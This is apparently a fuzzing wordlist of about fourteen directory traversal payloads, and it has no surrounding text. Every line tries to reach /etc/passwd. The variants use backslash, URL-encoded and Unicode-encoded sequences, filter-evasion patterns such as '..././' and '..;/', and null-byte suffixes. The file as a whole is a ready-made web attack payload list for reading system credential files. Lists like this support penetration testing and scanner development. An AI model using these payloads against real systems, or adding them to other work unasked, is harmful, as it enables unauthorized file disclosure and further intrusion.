../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\etc\passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
..././..././..././..././..././..././..././..././..././etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
../../../../../../../../../etc/passwd%00
..\..\..\..\..\..\..\..\..\etc\passwd%00
..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd%00
..././..././..././..././..././..././..././..././..././etc/passwd%00
..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd%00